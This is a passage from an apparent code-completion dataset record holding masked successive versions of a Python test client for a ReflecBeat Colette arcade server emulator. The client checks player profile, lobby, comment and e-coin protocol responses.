self.assert_path(resp, 'response/lobby/e/pref')\n self.assert_path(resp, 'response/lobby/e/stg')\n self.assert_path(resp, 'response/lobby/e/pside')\n self.assert_path(resp, 'response/lobby/e/eatime')\n self.assert_path(resp, 'response/lobby/e/ga')\n self.assert_path(resp, 'response/lobby/e/gp')\n self.assert_path(resp, 'response/lobby/e/la')\n self.assert_path(resp, 'response/lobby/e/ver')\n return resp.child_value('lobby/eid')\n\n def verify_lobby_delete(self, eid: int) ->None:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'delete')\n lobby.add_child(Node.s32('eid', eid))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby')\n\n def verify_pzlcmt_read(self, extid: int) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_read')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.s32('time', 0))\n info.add_child(Node.s32('limit', 30))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/comment/time')\n self.assert_path(resp, 'response/info/c/uid')\n self.assert_path(resp, 'response/info/c/name')\n self.assert_path(resp, 'response/info/c/icon')\n self.assert_path(resp, 'response/info/c/bln')\n self.assert_path(resp, 'response/info/c/tid')\n self.assert_path(resp, 'response/info/c/t_name')\n self.assert_path(resp, 'response/info/c/pref')\n self.assert_path(resp, 'response/info/c/time')\n self.assert_path(resp, 'response/info/c/comment')\n self.assert_path(resp, 'response/info/c/is_tweet')\n found = False\n for child in resp.child('info').children:\n if child.name != 'c':\n continue\n if child.child_value('uid') == extid:\n name = child.child_value('name')\n comment = child.child_value('comment')\n if name != self.NAME:\n raise Exception(\"Invalid name '{}' returned for comment!\"\n .format(name))\n if comment != 'アメ〜〜!':\n raise Exception(\n \"Invalid comment '{}' returned for comment!\".format\n (comment))\n found = True\n if not found:\n raise Exception('Comment we posted was not found!')\n <mask token>\n\n def verify_jbrbcollabo_save(self, refid: str) ->None:\n call = self.call_node()\n jbrbcollabo = Node.void('jbrbcollabo')\n jbrbcollabo.set_attribute('method', 'save')\n jbrbcollabo.add_child(Node.string('ref_id', refid))\n jbrbcollabo.add_child(Node.u16('cre_count', 0))\n call.add_child(jbrbcollabo)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/jbrbcollabo')\n\n def verify(self, cardid: Optional[str]) ->None:\n self.verify_services_get(expected_services=['pcbtracker',\n 'pcbevent', 'local', 'message', 'facility', 'cardmng',\n 'package', 'posevent', 'pkglist', 'dlstatus', 'eacoin', 'lobby',\n 'ntp', 'keepalive'])\n paseli_enabled = self.verify_pcbtracker_alive()\n self.verify_message_get()\n self.verify_package_list()\n location = self.verify_facility_get()\n self.verify_pcbevent_put()\n self.verify_pcb_boot(location)\n self.verify_info_common()\n if cardid is not None:\n card = cardid\n else:\n card = self.random_card()\n print('Generated random card ID {} for use.'.format(card))\n if cardid is None:\n self.verify_cardmng_inquire(card, msg_type='unregistered',\n paseli_enabled=paseli_enabled)\n ref_id = self.verify_cardmng_getrefid(card)\n if len(ref_id) != 16:\n raise Exception(\n \"Invalid refid '{}' returned when registering card\".\n format(ref_id))\n if ref_id != self.verify_cardmng_inquire(card, msg_type='new',\n paseli_enabled=paseli_enabled):\n raise Exception(\n \"Invalid refid '{}' returned when querying card\".format\n (ref_id))\n self.verify_player_start(ref_id)\n self.verify_player_delete(ref_id)\n self.verify_player_succeed(ref_id)\n extid = self.verify_player_write(ref_id, location, [{'id': 0,\n 'chart': 0, 'clear_type': -1, 'achievement_rate': 0,\n 'score': 0, 'combo': 0, 'miss_count': 0}])\n else:\n print('Skipping new card checks for existing card')\n ref_id = self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled)\n self.verify_cardmng_authpass(ref_id, correct=True)\n self.verify_cardmng_authpass(ref_id, correct=False)\n if ref_id != self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled):\n raise Exception(\"Invalid refid '{}' returned when querying card\"\n .format(ref_id))\n self.verify_lobby_read(location, extid)\n eid = self.verify_lobby_entry(location, extid)\n self.verify_lobby_delete(eid)\n self.verify_pzlcmt_write(extid)\n self.verify_pzlcmt_read(extid)\n self.verify_jbrbcollabo_save(ref_id)\n if cardid is None:\n for phase in [1, 2]:\n if phase == 1:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 2,\n 'achievement_rate': 7543, 'score': 432, 'combo': \n 123, 'miss_count': 5}, {'id': 1, 'chart': 0,\n 'clear_type': 4, 'achievement_rate': 9876, 'score':\n 543, 'combo': 543, 'miss_count': 0}, {'id': 3,\n 'chart': 2, 'clear_type': 2, 'achievement_rate': \n 1234, 'score': 123, 'combo': 42, 'miss_count': 54},\n {'id': 3, 'chart': 0, 'clear_type': 2,\n 'achievement_rate': 1024, 'score': 50, 'combo': 12,\n 'miss_count': 90}]\n if phase == 2:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 3,\n 'achievement_rate': 8765, 'score': 469, 'combo': \n 468, 'miss_count': 1}, {'id': 1, 'chart': 0,\n 'clear_type': 2, 'achievement_rate': 8765, 'score':\n 432, 'combo': 321, 'miss_count': 15,\n 'expected_score': 543, 'expected_clear_type': 4,\n 'expected_achievement_rate': 9876, 'expected_combo':\n 543, 'expected_miss_count': 0}]\n self.verify_player_write(ref_id, location, dummyscores)\n scores = self.verify_player_read(ref_id, location)\n for expected in dummyscores:\n actual = None\n for received in scores:\n if received['id'] == expected['id'] and received[\n 'chart'] == expected['chart']:\n actual = received\n break\n if actual is None:\n raise Exception(\n \"Didn't find song {} chart {} in response!\".\n format(expected['id'], expected['chart']))\n if 'expected_score' in expected:\n expected_score = expected['expected_score']\n else:\n expected_score = expected['score']\n if 'expected_achievement_rate' in expected:\n expected_achievement_rate = expected[\n 'expected_achievement_rate']\n else:\n expected_achievement_rate = expected['achievement_rate'\n ]\n if 'expected_clear_type' in expected:\n expected_clear_type = expected['expected_clear_type']\n else:\n expected_clear_type = expected['clear_type']\n if 'expected_combo' in expected:\n expected_combo = expected['expected_combo']\n else:\n expected_combo = expected['combo']\n if 'expected_miss_count' in expected:\n expected_miss_count = expected['expected_miss_count']\n else:\n expected_miss_count = expected['miss_count']\n if actual['score'] != expected_score:\n raise Exception(\n \"Expected a score of '{}' for song '{}' chart '{}' but got score '{}'\"\n .format(expected_score, expected['id'],\n expected['chart'], actual['score']))\n if actual['achievement_rate'] != expected_achievement_rate:\n raise Exception(\n \"Expected an achievement rate of '{}' for song '{}' chart '{}' but got achievement rate '{}'\"\n .format(expected_achievement_rate, expected[\n 'id'], expected['chart'], actual[\n 'achievement_rate']))\n if actual['clear_type'] != expected_clear_type:\n raise Exception(\n \"Expected a clear_type of '{}' for song '{}' chart '{}' but got clear_type '{}'\"\n .format(expected_clear_type, expected['id'],\n expected['chart'], actual['clear_type']))\n if actual['combo'] != expected_combo:\n raise Exception(\n \"Expected a combo of '{}' for song '{}' chart '{}' but got combo '{}'\"\n .format(expected_combo, expected['id'],\n expected['chart'], actual['combo']))\n if actual['miss_count'] != expected_miss_count:\n raise Exception(\n \"Expected a miss count of '{}' for song '{}' chart '{}' but got miss count '{}'\"\n .format(expected_miss_count, expected['id'],\n expected['chart'], actual['miss_count']))\n time.sleep(1)\n else:\n print('Skipping score checks for existing card')\n self.verify_player_end(ref_id)\n self.verify_info_ranking()\n if paseli_enabled:\n print('PASELI enabled for this PCBID, executing PASELI checks')\n else:\n print('PASELI disabled for this PCBID, skipping PASELI checks')\n return\n sessid, balance = self.verify_eacoin_checkin(card)\n if balance == 0:\n print('Skipping PASELI consume check because card has 0 balance')\n else:\n self.verify_eacoin_consume(sessid, balance, random.randint(0,\n balance))\n self.verify_eacoin_checkout(sessid)\n",
"step-3": "<mask token>\n\n\nclass ReflecBeatColette(BaseClient):\n <mask token>\n\n def verify_pcb_boot(self, loc: str) ->None:\n call = self.call_node()\n pcb = Node.void('pcb')\n pcb.set_attribute('method', 'boot')\n pcb.add_child(Node.string('lid', loc))\n call.add_child(pcb)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/pcb/sinfo/nm')\n self.assert_path(resp, 'response/pcb/sinfo/cl_enbl')\n self.assert_path(resp, 'response/pcb/sinfo/cl_h')\n self.assert_path(resp, 'response/pcb/sinfo/cl_m')\n\n def verify_info_common(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'common')\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/event_ctrl')\n self.assert_path(resp, 'response/info/item_lock_ctrl')\n\n def verify_info_ranking(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'ranking')\n info.add_child(Node.s32('ver', 0))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/ver')\n self.assert_path(resp, 'response/info/ranking/weekly/bt')\n self.assert_path(resp, 'response/info/ranking/weekly/et')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/monthly/bt')\n self.assert_path(resp, 'response/info/ranking/monthly/et')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/total/bt')\n self.assert_path(resp, 'response/info/ranking/total/et')\n self.assert_path(resp, 'response/info/ranking/total/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/total/new/d/cnt')\n\n def verify_player_start(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'start')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n player.add_child(Node.u16('gp', 10573))\n player.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/plyid')\n self.assert_path(resp, 'response/player/start_time')\n self.assert_path(resp, 'response/player/event_ctrl')\n self.assert_path(resp, 'response/player/item_lock_ctrl')\n self.assert_path(resp, 'response/player/lincle_link_4')\n self.assert_path(resp, 'response/player/jbrbcollabo')\n self.assert_path(resp, 'response/player/tricolettepark')\n\n def verify_player_delete(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'delete')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_end(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'end')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_succeed(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'succeed')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/name')\n self.assert_path(resp, 'response/player/lv')\n self.assert_path(resp, 'response/player/exp')\n self.assert_path(resp, 'response/player/grd')\n self.assert_path(resp, 'response/player/ap')\n self.assert_path(resp, 'response/player/released')\n self.assert_path(resp, 'response/player/mrecord')\n\n def verify_player_read(self, refid: str, location: str) ->List[Dict[str,\n int]]:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'read')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.string('lid', location))\n player.add_child(Node.s16('ver', 5))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/pdata/account/usrid')\n self.assert_path(resp, 'response/player/pdata/account/tpc')\n self.assert_path(resp, 'response/player/pdata/account/dpc')\n self.assert_path(resp, 'response/player/pdata/account/crd')\n self.assert_path(resp, 'response/player/pdata/account/brd')\n self.assert_path(resp, 'response/player/pdata/account/tdc')\n self.assert_path(resp, 'response/player/pdata/account/intrvld')\n self.assert_path(resp, 'response/player/pdata/account/ver')\n self.assert_path(resp, 'response/player/pdata/account/pst')\n self.assert_path(resp, 'response/player/pdata/account/st')\n self.assert_path(resp, 'response/player/pdata/base/name')\n self.assert_path(resp, 'response/player/pdata/base/exp')\n self.assert_path(resp, 'response/player/pdata/base/lv')\n self.assert_path(resp, 'response/player/pdata/base/mg')\n self.assert_path(resp, 'response/player/pdata/base/ap')\n self.assert_path(resp, 'response/player/pdata/base/tid')\n self.assert_path(resp, 'response/player/pdata/base/tname')\n self.assert_path(resp, 'response/player/pdata/base/cmnt')\n self.assert_path(resp, 'response/player/pdata/base/uattr')\n self.assert_path(resp, 'response/player/pdata/base/hidden_param')\n self.assert_path(resp, 'response/player/pdata/base/tbs')\n self.assert_path(resp, 'response/player/pdata/base/tbs_r')\n self.assert_path(resp, 'response/player/pdata/rival')\n self.assert_path(resp, 'response/player/pdata/fav_music_slot')\n self.assert_path(resp, 'response/player/pdata/custom')\n self.assert_path(resp, 'response/player/pdata/config')\n self.assert_path(resp, 'response/player/pdata/stamp')\n self.assert_path(resp, 'response/player/pdata/released')\n self.assert_path(resp, 'response/player/pdata/record')\n if resp.child_value('player/pdata/base/name') != self.NAME:\n raise Exception('Invalid name {} returned on profile read!'.\n format(resp.child_value('player/pdata/base/name')))\n scores = []\n for child in resp.child('player/pdata/record').children:\n if child.name != 'rec':\n continue\n score = {'id': child.child_value('mid'), 'chart': child.\n child_value('ntgrd'), 'clear_type': child.child_value('ct'),\n 'achievement_rate': child.child_value('ar'), 'score': child\n .child_value('scr'), 'combo': child.child_value('cmb'),\n 'miss_count': child.child_value('ms')}\n scores.append(score)\n return scores\n\n def verify_player_write(self, refid: str, loc: str, scores: List[Dict[\n str, int]]) ->int:\n call = self.call_node()\n player = Node.void('player')\n call.add_child(player)\n player.set_attribute('method', 'write')\n pdata = Node.void('pdata')\n player.add_child(pdata)\n account = Node.void('account')\n pdata.add_child(account)\n account.add_child(Node.s32('usrid', 0))\n account.add_child(Node.s32('plyid', 0))\n account.add_child(Node.s32('tpc', 1))\n account.add_child(Node.s32('dpc', 1))\n account.add_child(Node.s32('crd', 1))\n account.add_child(Node.s32('brd', 1))\n account.add_child(Node.s32('tdc', 1))\n account.add_child(Node.string('rid', refid))\n account.add_child(Node.string('lid', loc))\n account.add_child(Node.u8('mode', 0))\n account.add_child(Node.s16('ver', 5))\n account.add_child(Node.bool('pp', True))\n account.add_child(Node.bool('ps', True))\n account.add_child(Node.s16('pay', 0))\n account.add_child(Node.s16('pay_pc', 0))\n account.add_child(Node.u64('st', int(time.time() * 1000)))\n base = Node.void('base')\n pdata.add_child(base)\n base.add_child(Node.string('name', self.NAME))\n base.add_child(Node.s32('exp', 0))\n base.add_child(Node.s32('lv', 1))\n base.add_child(Node.s32('mg', -1))\n base.add_child(Node.s32('ap', -1))\n base.add_child(Node.s32_array('hidden_param', [0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]))\n base.add_child(Node.bool('is_tut', True))\n stglog = Node.void('stglog')\n pdata.add_child(stglog)\n index = 0\n for score in scores:\n log = Node.void('log')\n stglog.add_child(log)\n log.add_child(Node.s8('stg', index))\n log.add_child(Node.s16('mid', score['id']))\n log.add_child(Node.s8('ng', score['chart']))\n log.add_child(Node.s8('col', 0))\n log.add_child(Node.s8('mt', 7))\n log.add_child(Node.s8('rt', 0))\n log.add_child(Node.s8('ct', score['clear_type']))\n log.add_child(Node.s16('grd', 0))\n log.add_child(Node.s16('ar', score['achievement_rate']))\n log.add_child(Node.s16('sc', score['score']))\n log.add_child(Node.s16('jt_jst', 0))\n log.add_child(Node.s16('jt_grt', 0))\n log.add_child(Node.s16('jt_gd', 0))\n log.add_child(Node.s16('jt_ms', score['miss_count']))\n log.add_child(Node.s16('jt_jr', 0))\n log.add_child(Node.s16('cmb', score['combo']))\n log.add_child(Node.s16('exp', 0))\n log.add_child(Node.s32('r_uid', 0))\n log.add_child(Node.s32('r_plyid', 0))\n log.add_child(Node.s8('r_stg', 0))\n log.add_child(Node.s8('r_ct', -1))\n log.add_child(Node.s16('r_sc', 0))\n log.add_child(Node.s16('r_grd', 0))\n log.add_child(Node.s16('r_ar', 0))\n log.add_child(Node.s8('r_cpuid', -1))\n log.add_child(Node.s32('time', int(time.time())))\n log.add_child(Node.s8('decide', 0))\n index = index + 1\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/uid')\n return resp.child_value('player/uid')\n <mask token>\n\n def verify_lobby_entry(self, location: str, extid: int) ->int:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'entry')\n e = Node.void('e')\n lobby.add_child(e)\n e.add_child(Node.s32('eid', 0))\n e.add_child(Node.u16('mid', 79))\n e.add_child(Node.u8('ng', 0))\n e.add_child(Node.s32('uid', extid))\n e.add_child(Node.s32('uattr', 0))\n e.add_child(Node.string('pn', self.NAME))\n e.add_child(Node.s16('mg', 255))\n e.add_child(Node.s32('mopt', 0))\n e.add_child(Node.s32('tid', 0))\n e.add_child(Node.string('tn', ''))\n e.add_child(Node.s32('topt', 0))\n e.add_child(Node.string('lid', location))\n e.add_child(Node.string('sn', ''))\n e.add_child(Node.u8('pref', 51))\n e.add_child(Node.s8('stg', 4))\n e.add_child(Node.s8('pside', 0))\n e.add_child(Node.s16('eatime', 30))\n e.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n e.add_child(Node.u16('gp', 10007))\n e.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n e.add_child(Node.u8('ver', 5))\n lobby.add_child(Node.s32_array('friend', []))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby/interval')\n self.assert_path(resp, 'response/lobby/interval_p')\n self.assert_path(resp, 'response/lobby/eid')\n self.assert_path(resp, 'response/lobby/e/eid')\n self.assert_path(resp, 'response/lobby/e/mid')\n self.assert_path(resp, 'response/lobby/e/ng')\n self.assert_path(resp, 'response/lobby/e/uid')\n self.assert_path(resp, 'response/lobby/e/uattr')\n self.assert_path(resp, 'response/lobby/e/pn')\n self.assert_path(resp, 'response/lobby/e/mg')\n self.assert_path(resp, 'response/lobby/e/mopt')\n self.assert_path(resp, 'response/lobby/e/tid')\n self.assert_path(resp, 'response/lobby/e/tn')\n self.assert_path(resp, 'response/lobby/e/topt')\n self.assert_path(resp, 'response/lobby/e/lid')\n self.assert_path(resp, 'response/lobby/e/sn')\n self.assert_path(resp, 'response/lobby/e/pref')\n self.assert_path(resp, 'response/lobby/e/stg')\n self.assert_path(resp, 'response/lobby/e/pside')\n self.assert_path(resp, 'response/lobby/e/eatime')\n self.assert_path(resp, 'response/lobby/e/ga')\n self.assert_path(resp, 'response/lobby/e/gp')\n self.assert_path(resp, 'response/lobby/e/la')\n self.assert_path(resp, 'response/lobby/e/ver')\n return resp.child_value('lobby/eid')\n\n def verify_lobby_delete(self, eid: int) ->None:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'delete')\n lobby.add_child(Node.s32('eid', eid))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby')\n\n def verify_pzlcmt_read(self, extid: int) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_read')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.s32('time', 0))\n info.add_child(Node.s32('limit', 30))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/comment/time')\n self.assert_path(resp, 'response/info/c/uid')\n self.assert_path(resp, 'response/info/c/name')\n self.assert_path(resp, 'response/info/c/icon')\n self.assert_path(resp, 'response/info/c/bln')\n self.assert_path(resp, 'response/info/c/tid')\n self.assert_path(resp, 'response/info/c/t_name')\n self.assert_path(resp, 'response/info/c/pref')\n self.assert_path(resp, 'response/info/c/time')\n self.assert_path(resp, 'response/info/c/comment')\n self.assert_path(resp, 'response/info/c/is_tweet')\n found = False\n for child in resp.child('info').children:\n if child.name != 'c':\n continue\n if child.child_value('uid') == extid:\n name = child.child_value('name')\n comment = child.child_value('comment')\n if name != self.NAME:\n raise Exception(\"Invalid name '{}' returned for comment!\"\n .format(name))\n if comment != 'アメ〜〜!':\n raise Exception(\n \"Invalid comment '{}' returned for comment!\".format\n (comment))\n found = True\n if not found:\n raise Exception('Comment we posted was not found!')\n\n def verify_pzlcmt_write(self, extid: int) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_write')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.string('name', self.NAME))\n info.add_child(Node.s16('icon', 0))\n info.add_child(Node.s8('bln', 0))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.string('t_name', ''))\n info.add_child(Node.s8('pref', 51))\n info.add_child(Node.s32('time', int(time.time())))\n info.add_child(Node.string('comment', 'アメ〜〜!'))\n info.add_child(Node.bool('is_tweet', True))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info')\n\n def verify_jbrbcollabo_save(self, refid: str) ->None:\n call = self.call_node()\n jbrbcollabo = Node.void('jbrbcollabo')\n jbrbcollabo.set_attribute('method', 'save')\n jbrbcollabo.add_child(Node.string('ref_id', refid))\n jbrbcollabo.add_child(Node.u16('cre_count', 0))\n call.add_child(jbrbcollabo)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/jbrbcollabo')\n\n def verify(self, cardid: Optional[str]) ->None:\n self.verify_services_get(expected_services=['pcbtracker',\n 'pcbevent', 'local', 'message', 'facility', 'cardmng',\n 'package', 'posevent', 'pkglist', 'dlstatus', 'eacoin', 'lobby',\n 'ntp', 'keepalive'])\n paseli_enabled = self.verify_pcbtracker_alive()\n self.verify_message_get()\n self.verify_package_list()\n location = self.verify_facility_get()\n self.verify_pcbevent_put()\n self.verify_pcb_boot(location)\n self.verify_info_common()\n if cardid is not None:\n card = cardid\n else:\n card = self.random_card()\n print('Generated random card ID {} for use.'.format(card))\n if cardid is None:\n self.verify_cardmng_inquire(card, msg_type='unregistered',\n paseli_enabled=paseli_enabled)\n ref_id = self.verify_cardmng_getrefid(card)\n if len(ref_id) != 16:\n raise Exception(\n \"Invalid refid '{}' returned when registering card\".\n format(ref_id))\n if ref_id != self.verify_cardmng_inquire(card, msg_type='new',\n paseli_enabled=paseli_enabled):\n raise Exception(\n \"Invalid refid '{}' returned when querying card\".format\n (ref_id))\n self.verify_player_start(ref_id)\n self.verify_player_delete(ref_id)\n self.verify_player_succeed(ref_id)\n extid = self.verify_player_write(ref_id, location, [{'id': 0,\n 'chart': 0, 'clear_type': -1, 'achievement_rate': 0,\n 'score': 0, 'combo': 0, 'miss_count': 0}])\n else:\n print('Skipping new card checks for existing card')\n ref_id = self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled)\n self.verify_cardmng_authpass(ref_id, correct=True)\n self.verify_cardmng_authpass(ref_id, correct=False)\n if ref_id != self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled):\n raise Exception(\"Invalid refid '{}' returned when querying card\"\n .format(ref_id))\n self.verify_lobby_read(location, extid)\n eid = self.verify_lobby_entry(location, extid)\n self.verify_lobby_delete(eid)\n self.verify_pzlcmt_write(extid)\n self.verify_pzlcmt_read(extid)\n self.verify_jbrbcollabo_save(ref_id)\n if cardid is None:\n for phase in [1, 2]:\n if phase == 1:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 2,\n 'achievement_rate': 7543, 'score': 432, 'combo': \n 123, 'miss_count': 5}, {'id': 1, 'chart': 0,\n 'clear_type': 4, 'achievement_rate': 9876, 'score':\n 543, 'combo': 543, 'miss_count': 0}, {'id': 3,\n 'chart': 2, 'clear_type': 2, 'achievement_rate': \n 1234, 'score': 123, 'combo': 42, 'miss_count': 54},\n {'id': 3, 'chart': 0, 'clear_type': 2,\n 'achievement_rate': 1024, 'score': 50, 'combo': 12,\n 'miss_count': 90}]\n if phase == 2:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 3,\n 'achievement_rate': 8765, 'score': 469, 'combo': \n 468, 'miss_count': 1}, {'id': 1, 'chart': 0,\n 'clear_type': 2, 'achievement_rate': 8765, 'score':\n 432, 'combo': 321, 'miss_count': 15,\n 'expected_score': 543, 'expected_clear_type': 4,\n 'expected_achievement_rate': 9876, 'expected_combo':\n 543, 'expected_miss_count': 0}]\n self.verify_player_write(ref_id, location, dummyscores)\n scores = self.verify_player_read(ref_id, location)\n for expected in dummyscores:\n actual = None\n for received in scores:\n if received['id'] == expected['id'] and received[\n 'chart'] == expected['chart']:\n actual = received\n break\n if actual is None:\n raise Exception(\n \"Didn't find song {} chart {} in response!\".\n format(expected['id'], expected['chart']))\n if 'expected_score' in expected:\n expected_score = expected['expected_score']\n else:\n expected_score = expected['score']\n if 'expected_achievement_rate' in expected:\n expected_achievement_rate = expected[\n 'expected_achievement_rate']\n else:\n expected_achievement_rate = expected['achievement_rate'\n ]\n if 'expected_clear_type' in expected:\n expected_clear_type = expected['expected_clear_type']\n else:\n expected_clear_type = expected['clear_type']\n if 'expected_combo' in expected:\n expected_combo = expected['expected_combo']\n else:\n expected_combo = expected['combo']\n if 'expected_miss_count' in expected:\n expected_miss_count = expected['expected_miss_count']\n else:\n expected_miss_count = expected['miss_count']\n if actual['score'] != expected_score:\n raise Exception(\n \"Expected a score of '{}' for song '{}' chart '{}' but got score '{}'\"\n .format(expected_score, expected['id'],\n expected['chart'], actual['score']))\n if actual['achievement_rate'] != expected_achievement_rate:\n raise Exception(\n \"Expected an achievement rate of '{}' for song '{}' chart '{}' but got achievement rate '{}'\"\n .format(expected_achievement_rate, expected[\n 'id'], expected['chart'], actual[\n 'achievement_rate']))\n if actual['clear_type'] != expected_clear_type:\n raise Exception(\n \"Expected a clear_type of '{}' for song '{}' chart '{}' but got clear_type '{}'\"\n .format(expected_clear_type, expected['id'],\n expected['chart'], actual['clear_type']))\n if actual['combo'] != expected_combo:\n raise Exception(\n \"Expected a combo of '{}' for song '{}' chart '{}' but got combo '{}'\"\n .format(expected_combo, expected['id'],\n expected['chart'], actual['combo']))\n if actual['miss_count'] != expected_miss_count:\n raise Exception(\n \"Expected a miss count of '{}' for song '{}' chart '{}' but got miss count '{}'\"\n .format(expected_miss_count, expected['id'],\n expected['chart'], actual['miss_count']))\n time.sleep(1)\n else:\n print('Skipping score checks for existing card')\n self.verify_player_end(ref_id)\n self.verify_info_ranking()\n if paseli_enabled:\n print('PASELI enabled for this PCBID, executing PASELI checks')\n else:\n print('PASELI disabled for this PCBID, skipping PASELI checks')\n return\n sessid, balance = self.verify_eacoin_checkin(card)\n if balance == 0:\n print('Skipping PASELI consume check because card has 0 balance')\n else:\n self.verify_eacoin_consume(sessid, balance, random.randint(0,\n balance))\n self.verify_eacoin_checkout(sessid)\n",
"step-4": "<mask token>\n\n\nclass ReflecBeatColette(BaseClient):\n NAME = 'TEST'\n\n def verify_pcb_boot(self, loc: str) ->None:\n call = self.call_node()\n pcb = Node.void('pcb')\n pcb.set_attribute('method', 'boot')\n pcb.add_child(Node.string('lid', loc))\n call.add_child(pcb)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/pcb/sinfo/nm')\n self.assert_path(resp, 'response/pcb/sinfo/cl_enbl')\n self.assert_path(resp, 'response/pcb/sinfo/cl_h')\n self.assert_path(resp, 'response/pcb/sinfo/cl_m')\n\n def verify_info_common(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'common')\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/event_ctrl')\n self.assert_path(resp, 'response/info/item_lock_ctrl')\n\n def verify_info_ranking(self) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'ranking')\n info.add_child(Node.s32('ver', 0))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/ver')\n self.assert_path(resp, 'response/info/ranking/weekly/bt')\n self.assert_path(resp, 'response/info/ranking/weekly/et')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/weekly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/monthly/bt')\n self.assert_path(resp, 'response/info/ranking/monthly/et')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/monthly/new/d/cnt')\n self.assert_path(resp, 'response/info/ranking/total/bt')\n self.assert_path(resp, 'response/info/ranking/total/et')\n self.assert_path(resp, 'response/info/ranking/total/new/d/mid')\n self.assert_path(resp, 'response/info/ranking/total/new/d/cnt')\n\n def verify_player_start(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'start')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n player.add_child(Node.u16('gp', 10573))\n player.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/plyid')\n self.assert_path(resp, 'response/player/start_time')\n self.assert_path(resp, 'response/player/event_ctrl')\n self.assert_path(resp, 'response/player/item_lock_ctrl')\n self.assert_path(resp, 'response/player/lincle_link_4')\n self.assert_path(resp, 'response/player/jbrbcollabo')\n self.assert_path(resp, 'response/player/tricolettepark')\n\n def verify_player_delete(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n 